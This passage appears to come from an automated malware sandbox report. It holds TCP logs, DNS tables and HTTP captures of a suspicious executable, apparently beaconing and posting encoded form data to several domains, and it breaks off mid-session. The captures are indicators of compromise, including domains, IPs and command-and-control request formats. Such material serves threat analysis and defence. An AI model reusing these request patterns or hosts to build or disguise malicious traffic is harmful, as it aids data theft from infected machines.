                                                                                                                                            Oct 22, 2024 13:27:56.199821949 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.199830055 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:56.199856997 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.199898958 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:56.205377102 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.205411911 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.205463886 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:56.240358114 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.240417004 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.240461111 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:56.316557884 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.316589117 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.316639900 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.316648006 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:56.316669941 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.316710949 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:56.316770077 CEST8049978216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:56.316814899 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:57.009630919 CEST4997880192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.027944088 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.033582926 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.033680916 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.043061972 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.048388958 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925225019 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925271988 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925308943 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925322056 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.925348043 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925384045 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925393105 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.925419092 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925451994 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925461054 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.925487995 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925522089 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925529957 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.925554037 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925569057 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.925590992 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.931293964 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.931320906 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.931339979 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.931354046 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.931385040 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:58.931586981 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.931603909 CEST8049979216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:58.931644917 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:27:59.556462049 CEST4997980192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:00.575159073 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:00.581190109 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:00.581293106 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:00.592179060 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:00.597819090 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:00.597974062 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.280433893 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.280462027 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.280478001 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.280493021 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.280509949 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.280525923 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.280544043 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.280561924 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.280636072 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:01.280636072 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:01.281164885 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.281183004 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.281238079 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:01.286170959 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.286206961 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.286276102 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:01.314779997 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.314810991 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.314956903 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:01.576741934 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.576792002 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.576831102 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.576860905 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.576893091 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.576929092 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.576952934 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:01.576952934 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:01.576952934 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:01.576997995 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:01.955837011 CEST8049980216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:01.955928087 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:02.103022099 CEST4998080192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:03.122478962 CEST4998180192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:03.127909899 CEST8049981216.40.34.41192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:03.127998114 CEST4998180192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:03.135566950 CEST4998180192.168.2.5216.40.34.41
                                                                                                                                            Oct 22, 2024 13:28:58.410136938 CEST804999713.248.169.48192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:58.442400932 CEST804999713.248.169.48192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:58.442526102 CEST4999780192.168.2.513.248.169.48
                                                                                                                                            Oct 22, 2024 13:28:58.443485022 CEST4999780192.168.2.513.248.169.48
                                                                                                                                            Oct 22, 2024 13:28:58.448904991 CEST804999713.248.169.48192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:03.911695957 CEST4999880192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:03.917148113 CEST80499983.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:03.917216063 CEST4999880192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:03.930412054 CEST4999880192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:03.935947895 CEST80499983.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:04.538633108 CEST80499983.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:04.538748980 CEST4999880192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:05.446907043 CEST4999880192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:05.452594995 CEST80499983.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:06.464679003 CEST4999980192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:06.470534086 CEST80499993.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:06.471461058 CEST4999980192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:06.483345985 CEST4999980192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:06.488886118 CEST80499993.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:07.993658066 CEST4999980192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:07.999445915 CEST80499993.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:07.999505997 CEST4999980192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:09.011698961 CEST5000080192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:09.019555092 CEST80500003.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:09.019773006 CEST5000080192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:09.029290915 CEST5000080192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:09.038357973 CEST80500003.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:09.039205074 CEST80500003.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:09.669636965 CEST80500003.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:09.669744015 CEST5000080192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:10.543368101 CEST5000080192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:10.637358904 CEST80500003.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:11.558331013 CEST5000180192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:11.564100027 CEST80500013.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:11.564327955 CEST5000180192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:11.569258928 CEST5000180192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:11.574832916 CEST80500013.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:12.188291073 CEST80500013.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:12.188399076 CEST80500013.33.130.190192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:12.188746929 CEST5000180192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:12.192298889 CEST5000180192.168.2.53.33.130.190
                                                                                                                                            Oct 22, 2024 13:29:12.197918892 CEST80500013.33.130.190192.168.2.5
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 22, 2024 13:26:45.783858061 CEST5677053192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:26:45.881920099 CEST53567701.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:38.909348011 CEST6373453192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:27:39.004682064 CEST53637341.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:55.106684923 CEST5586753192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:27:55.477144003 CEST53558671.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:08.878012896 CEST6396453192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:28:08.903202057 CEST53639641.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:22.636953115 CEST5537653192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:28:22.706584930 CEST53553761.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:36.348496914 CEST6483253192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:28:36.412081003 CEST53648321.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:28:49.893327951 CEST6372653192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:28:49.934215069 CEST53637261.1.1.1192.168.2.5
                                                                                                                                            Oct 22, 2024 13:29:03.748092890 CEST6415753192.168.2.51.1.1.1
                                                                                                                                            Oct 22, 2024 13:29:03.909686089 CEST53641571.1.1.1192.168.2.5
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Oct 22, 2024 13:26:45.783858061 CEST | 192.168.2.5 | 1.1.1.1 | 0x3f70 | Standard query (0) | kambud.biz | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:27:38.909348011 CEST | 192.168.2.5 | 1.1.1.1 | 0x7d43 | Standard query (0) | www.svarus.online | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:27:55.106684923 CEST | 192.168.2.5 | 1.1.1.1 | 0xc9ca | Standard query (0) | www.newhopetoday.app | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:28:08.878012896 CEST | 192.168.2.5 | 1.1.1.1 | 0x520e | Standard query (0) | www.ladylawher.org | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:28:22.636953115 CEST | 192.168.2.5 | 1.1.1.1 | 0x51d0 | Standard query (0) | www.nutrigenfit.online | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:28:36.348496914 CEST | 192.168.2.5 | 1.1.1.1 | 0xba6 | Standard query (0) | www.gold-rates.online | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:28:49.893327951 CEST | 192.168.2.5 | 1.1.1.1 | 0xedc0 | Standard query (0) | www.3808.app | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:29:03.748092890 CEST | 192.168.2.5 | 1.1.1.1 | 0x6f8a | Standard query (0) | www.yourwebbuzz.net | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Oct 22, 2024 13:26:45.881920099 CEST | 1.1.1.1 | 192.168.2.5 | 0x3f70 | No error (0) | kambud.biz | | 185.17.43.223 | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:27:39.004682064 CEST | 1.1.1.1 | 192.168.2.5 | 0x7d43 | No error (0) | www.svarus.online | | 194.58.112.174 | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:27:55.477144003 CEST | 1.1.1.1 | 192.168.2.5 | 0xc9ca | No error (0) | www.newhopetoday.app | | 216.40.34.41 | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:28:08.903202057 CEST | 1.1.1.1 | 192.168.2.5 | 0x520e | No error (0) | www.ladylawher.org | ladylawher.org | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 22, 2024 13:28:08.903202057 CEST | 1.1.1.1 | 192.168.2.5 | 0x520e | No error (0) | ladylawher.org | | 3.33.130.190 | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:28:08.903202057 CEST | 1.1.1.1 | 192.168.2.5 | 0x520e | No error (0) | ladylawher.org | | 15.197.148.33 | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:28:22.706584930 CEST | 1.1.1.1 | 192.168.2.5 | 0x51d0 | No error (0) | www.nutrigenfit.online | nutrigenfit.online | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 22, 2024 13:28:22.706584930 CEST | 1.1.1.1 | 192.168.2.5 | 0x51d0 | No error (0) | nutrigenfit.online | | 195.110.124.133 | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:28:36.412081003 CEST | 1.1.1.1 | 192.168.2.5 | 0xba6 | No error (0) | www.gold-rates.online | | 199.59.243.227 | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:28:49.934215069 CEST | 1.1.1.1 | 192.168.2.5 | 0xedc0 | No error (0) | www.3808.app | | 13.248.169.48 | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:28:49.934215069 CEST | 1.1.1.1 | 192.168.2.5 | 0xedc0 | No error (0) | www.3808.app | | 76.223.54.146 | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:29:03.909686089 CEST | 1.1.1.1 | 192.168.2.5 | 0x6f8a | No error (0) | www.yourwebbuzz.net | yourwebbuzz.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 22, 2024 13:29:03.909686089 CEST | 1.1.1.1 | 192.168.2.5 | 0x6f8a | No error (0) | yourwebbuzz.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false |
| Oct 22, 2024 13:29:03.909686089 CEST | 1.1.1.1 | 192.168.2.5 | 0x6f8a | No error (0) | yourwebbuzz.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49977 | 194.58.112.174 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe |
Timestamp: Oct 22, 2024 13:27:39.024836063 CEST, Bytes transferred: 431, Direction: OUT, Data:
GET /sa87/?vd=fhUlwfGxBn-tt&-v4puN=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8NGP70JKOBpAfy7n0mtS8Kr3O7U4faJdfEPNjknslXQEWEA== HTTP/1.1
Host: www.svarus.online
Accept: */*
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36

Timestamp: Oct 22, 2024 13:27:39.917622089 CEST, Bytes transferred: 1236, Direction: IN, Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 22 Oct 2024 11:27:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49978 | 216.40.34.41 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 13:27:55.497391939 CEST | 697 | OUT | POST /y868/ HTTP/1.1
                                                                                                                                            Host: www.newhopetoday.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.newhopetoday.app
                                                                                                                                            Referer: http://www.newhopetoday.app/y868/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=yuPu17ZIHkrUqmagNfTAdEsgmNM4MikoJbodw7UOOYJ3ix3xAazYyPuubYGaLs5as3C++nxV1rneqKWb8AnWgkvvxCmZ6efkhXRlwE5xRVMGCXYA2UI919OsVYeslL6kmFDG4gamc/itJWafh2lafeDf+g+lue2+5xdn2GGy6BTepqvLHgexPMAWLSgnmwMvB06SJzE=
Oct 22, 2024 13:27:56.199512005 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                            x-request-id: 4a31b0fc-240d-4165-8e51-d421e7e48755
                                                                                                                                            x-runtime: 0.035018
                                                                                                                                            content-length: 17022
                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49979 | 216.40.34.41 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 13:27:58.043061972 CEST | 717 | OUT | POST /y868/ HTTP/1.1
                                                                                                                                            Host: www.newhopetoday.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.newhopetoday.app
                                                                                                                                            Referer: http://www.newhopetoday.app/y868/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=yuPu17ZIHkrUrHqgI87AbksjptM4CCkSJbkdw+keJtZ3jUTxBfTYxPuuPIGDTM5Es3PD+mdV1rzeqKmb83zVi0v6qymb0+fkhXRlwAZLRVUGCkwAkhk65dOtYIeshL6gmFC84l6Ic6+tJTmfvHldWeDVhQ/k/8rA3DF2+3j2ggyil8ehdCWZcssubBoQ3AtGbXqiXkTOGpCSUSzTGsHV00uy/3OW
Oct 22, 2024 13:27:58.925225019 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                            x-request-id: 5d18c69d-b52f-4fc3-b1ae-01bb60fb5ea6
                                                                                                                                            x-runtime: 0.034907
                                                                                                                                            content-length: 17042
                                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49980 | 216.40.34.41 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 13:28:00.592179060 CEST | 1734 | OUT | POST /y868/ HTTP/1.1
                                                                                                                                            Host: www.newhopetoday.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.newhopetoday.app
                                                                                                                                            Referer: http://www.newhopetoday.app/y868/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Data Ascii: -v4puN= [TRUNCATED]
Oct 22, 2024 13:28:01.280433893 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                            x-request-id: 76479084-936f-46e8-a604-cf2f4b663d72
                                                                                                                                            x-runtime: 0.033822
                                                                                                                                            content-length: 18058
                                                                                                                                            connection: close
                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49981 | 216.40.34.41 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 13:28:03.135566950 CEST | 434 | OUT | GET /y868/?-v4puN=/snO2OMeD1KGuCX8I8PTb0wPk7oIGCcnJpJV3p53H8t3rhvkFO7Hu8uja/+IWsU7s0a4pmtYzeb4/oul2jeOp0uvryv675HptA9HxwsyIlIOO11NrggPw5LqW5SmsafU0A==&vd=fhUlwfGxBn-tt HTTP/1.1
                                                                                                                                            Host: www.newhopetoday.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Oct 22, 2024 13:28:03.816778898 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                            x-download-options: noopen
                                                                                                                                            x-permitted-cross-domain-policies: none
                                                                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                            etag: W/"489b1cc03742192cd82a546616d2ba37"
                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                            x-request-id: bf1e3320-74ae-4ff7-8a04-1823199b45ff
                                                                                                                                            x-runtime: 0.006874
                                                                                                                                            transfer-encoding: chunked
                                                                                                                                            connection: close
                                                                                                                                            Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>newhopetoday.app is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=p


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49982 | 3.33.130.190 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 13:28:08.922418118 CEST | 691 | OUT | POST /tcwz/ HTTP/1.1
                                                                                                                                            Host: www.ladylawher.org
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
